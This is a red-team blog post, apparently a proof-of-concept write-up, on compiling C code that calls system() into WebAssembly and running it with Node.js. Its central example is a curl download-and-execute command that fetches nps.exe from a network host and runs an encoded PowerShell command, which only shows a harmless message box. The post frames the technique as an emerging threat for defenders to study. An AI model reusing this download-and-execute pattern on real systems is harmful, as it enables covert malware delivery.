<!DOCTYPE html>
<html lang="en">

<head><meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<link href="https://fonts.googleapis.com/css?family=Merriweather:300|Raleway:400,700" rel="stylesheet">
<link rel="stylesheet" href="/assets/css/style.css">
<title>WEBASSEMBLY – EXECUTING MALICIOUS CODE USING SYSTEM()</title>
<!-- Begin Jekyll SEO tag v2.6.1 -->
<title>WEBASSEMBLY – EXECUTING MALICIOUS CODE USING SYSTEM() | IAMROOT</title>
<meta name="generator" content="Jekyll v4.1.1" />
<meta property="og:title" content="WEBASSEMBLY – EXECUTING MALICIOUS CODE USING SYSTEM()" />
<meta name="author" content="Kartik Durg" />
<meta property="og:locale" content="en_US" />
<meta name="description" content="I think we can do more than this.." />
<meta property="og:description" content="I think we can do more than this.." />
<link rel="canonical" href="http://localhost:4000/2020/06/29/webassembly-executing-malicious-code-using-system.html" />
<meta property="og:url" content="http://localhost:4000/2020/06/29/webassembly-executing-malicious-code-using-system.html" />
<meta property="og:site_name" content="IAMROOT" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2020-06-29T00:00:00+05:30" />
<script type="application/ld+json">
{"mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2020/06/29/webassembly-executing-malicious-code-using-system.html"},"author":{"@type":"Person","name":"Kartik Durg"},"description":"I think we can do more than this..","headline":"WEBASSEMBLY – EXECUTING MALICIOUS CODE USING SYSTEM()","dateModified":"2020-06-29T00:00:00+05:30","datePublished":"2020-06-29T00:00:00+05:30","@type":"BlogPosting","url":"http://localhost:4000/2020/06/29/webassembly-executing-malicious-code-using-system.html","@context":"https://schema.org"}</script>
<!-- End Jekyll SEO tag -->


<head>

</head></head>

<body>
  <main class="container">
    <section class="about">
      <a href="/"><img src="/assets/portfolio.jpg" alt="Kartik Durg"></a>
      <h2 id="title">
        <a href="/">Kartik Durg</a>
      </h2>
      <p class="tagline">Red Team Research @McAfee</p>
      <ul class="social"><a href="https://github.com/kartikdurg" target="_blank">
          <li>
            <i class="icon-github-circled"></i>
          </li>
        </a><a href="https://www.linkedin.com/in/kartikdurg" target="_blank">
          <li>
            <i class="icon-linkedin-squared"></i>
          </li>
        </a><a href="https://twitter.com/kartikdurg" target="_blank">
          <li>
            <i class="icon-twitter-squared"></i>
          </li>
        </a></ul><nav class="navigation">
        <ul>
          
          <li>
            <a href="/index.html">Home</a>
          </li>
          
        </ul>
      </nav><p>&copy;
        2020</p><div>
        <p>Dark Mode
          <i class="icon-moon"></i>
          <label class="switch">
            <input type="checkbox" id="dark-mode-toggle">
            <span class="slider round" onclick="toggleDarkMode()"></span>
          </label>
        </p>
      </div>
      <script type="text/javascript" src="/assets/js/darkmode.js"></script></section>
    <section class="content">
      <div class="post-container">
  <a class="post-link" href="/2020/06/29/webassembly-executing-malicious-code-using-system.html">
    <h2 class="post-title">WEBASSEMBLY – EXECUTING MALICIOUS CODE USING SYSTEM()</h2>
  </a>
  <div class="post-meta">
    <div class="post-date"><i class="icon-calendar"></i>Jun 29, 2020</div></div>
  <div class="post">
    <p>Adversaries are getting more innovative, less predictable and underscoring society’s need to stay one step ahead of them. In this post I am going to share a technique that came across my mind when I was learning about WebAssembly.</p>

<blockquote>
  <p>Derived from MDN Web docs: “WebAssembly” is a new type of code that can be run in modern web browsers — it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages such as C/C++ and Rust with a compilation target so that they can run on the web. It is also designed to run alongside JavaScript, allowing both to work together.</p>
</blockquote>

<p>Reference: <a href="https://developer.mozilla.org/en-US/docs/WebAssembly">WebAssembly</a></p>

<p>Before we begin, lets look at a simple C program and then compile it using Emscripten SDK so that, it can run on a web browser.</p>

<p>To do the same get the <a href="https://emscripten.org/docs/getting_started/downloads.html">Emscripten SDK</a> and take a copy of “woot.c” as below :</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdio.h&gt;
int main(int argc, char ** argv) {
    printf("Woot woot!\n");
}
</code></pre></div></div>

<p>Now run the following command to get the “wasm” output:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>emcc woot.c -s WASM=1 -o woot.html
</code></pre></div></div>

<p>Once compiled we should have two files:</p>

<ul>
  <li><a href="https://github.com/kartikdurg/WASSUP-WASM/blob/master/Examples/HelloWorld/woot.txt">hello.wasm</a>: The WASM binary file that contains low-level memory models of C language.</li>
  <li><a href="https://github.com/kartikdurg/WASSUP-WASM/blob/master/Examples/HelloWorld/woot.js">hello.js</a>: A JavaScript file that can translate between the native C functions, and JavaScript/wasm.</li>
</ul>

<p>As seen below, a HTML file with a link to “hello.js” can be used to load, compile, and instantiate the wasm code. Once it is opened in a browser, the output can be observed in the browsers console as seen in the below image:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;meta charset="utf-8" /&gt;
    &lt;meta http-equiv="X-UA-Compatible" content="IE=edge"&gt;
    &lt;title&gt;WASM Demo&lt;/title&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;h1&gt;WASM Demo&lt;/h1&gt;
    &lt;script src="woot.js"&gt;&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre></div></div>

<p><img src="/media/web-output.jpg" alt="" /></p>

<p>Emscripten SDK provides a method called emscripten_run_script() to run the specified JavaScript from C/C++ using the browsers “eval()” function. Hence, this would be an another area for security professionals to explore and find a way to abuse it.</p>

<p>Refer: <a href="https://emscripten.org/docs/porting/connecting_cpp_and_javascript/Interacting-with-code.html#interacting-with-code-call-javascript-from-native">Interacting with code call javascript from native</a></p>

<p>It also supports number of built-in standard libraries like libc, libc++ and SDL. Libraries that are not included in this SDK must be converted to bitcode and then compile that library and main program’s bitcode together to JavaScript. For this post, I will be using System() function because it is already present in a standard library that comes with EMSDK.</p>

<p>Refer: <a href="https://emscripten.org/docs/compiling/Building-Projects.html#building-projects">https://emscripten.org/docs/compiling/Building-Projects.html#building-projects</a></p>

<p>Also, the commands executed by “System()” function are present in underlying OS, but not in the browser. Hence, I am making use of Node.JS binary to execute the JavaScript generated by EMSDK. The below code downloads no-powershell binary and executes powershell script using the same:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;iostream&gt;
#include &lt;stdlib.h&gt;
using namespace std;
 
int main(int argc, const char *argv[]) {
system("curl http://192.168.0.107/nps.exe --output C:\\Users\\Public\\nps.exe &amp;&amp; C:\\Users\\Public\\nps.exe -encodedcommand QQBkAGQALQBUAHkAcABlACAALQBBAHMAcwBlAG0AYgBsAHkATgBhAG0AZQAgAFAAcgBlAHMAZQBuAHQAYQB0AGkAbwBuAEMAbwByAGUALABQAHIAZQBzAGUAbgB0AGEAdABpAG8AbgBGAHIAYQBtAGUAdwBvAHIAawA7ACQAbQBzAGcAQgBvAGQAeQAgAD0AIAAiAFcAMAAwAHQAIABXADAAMAB0ACEAIQAiADsAWwBTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBNAGUAcwBzAGEAZwBlAEIAbwB4AF0AOgA6AFMAaABvAHcAKAAkAG0AcwBnAEIAbwBkAHkAKQA=");
return 0;
}
</code></pre></div></div>

<h3 id="compiling-and-executing-the-final-shellcode">COMPILING AND EXECUTING THE FINAL SHELLCODE:</h3>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>emcc curl.cc -s WASM=1 -o wasm.js
</code></pre></div></div>

<p>Execution using Node.JS:</p>

<p><img src="/media/no-pwsh.gif" alt="" /></p>

<p>The use of Node.js is an unusual choice for malware authors and it’s usage is increasing when it comes to writing a malware. Check out the usage of Node.Js in a recent attack from the link below:</p>

<p>Refer: <a href="https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/">https://blog.trendmicro.com/trendlabs-security-intelligence/qnodeservice-node-js-trojan-spread-via-covid-19-lure/</a></p>

<p>The difference between JavaScript used in above attack and the one generated by Emscripten SDK is that, it contains code that implements the functionality of each respective library used by the C/C++ code and also the logic for calling the WebAssembly JavaScript APIs to fetch, load and run the .wasm file. As this feature provides a way to run code written in multiple languages on the web, it is very much likely to become a security threat in the near future. Hence, we as security professionals must identify and detect these threats before they are used in cyber attacks.</p>

<p>Also, check out this small application that can be used to download and execute WASM binary using Node.JS:</p>

<p><a href="https://github.com/kartikdurg/WASSUP-WASM">https://github.com/kartikdurg/WASSUP-WASM</a></p>

<p>Thank you for reading 🙂</p>

<p>– Kartik Durg</p>

  </div><div id="disqus_thread" style="margin-top:25px"></div>
  <script>
    var disqus_config = function () {
      this.page.url = 'http://localhost:4000/2020/06/29/webassembly-executing-malicious-code-using-system.html';
      this.page.identifier = 'http://localhost:4000/2020/06/29/webassembly-executing-malicious-code-using-system.html';
    };
    (function () {
      var d = document, s = d.createElement('script');
      s.src = 'https://redteam.disqus.com/embed.js';
      s.setAttribute('data-timestamp', +new Date());
      (d.head || d.body).appendChild(s);
    })();
  </script>
  <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript" rel="nofollow">comments
      powered by Disqus.</a></noscript></div>

    </section>
  </main><script async src="https://www.googletagmanager.com/gtag/js?id=UA-176694116-1"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag() { dataLayer.push(arguments); }
    gtag('js', new Date());
    gtag('config', 'UA-176694116-1');
  </script>
  <script src="/assets/js/simple-jekyll-search.min.js"></script>
  <script src="/assets/js/search.js"></script>
  
</body>

</html>
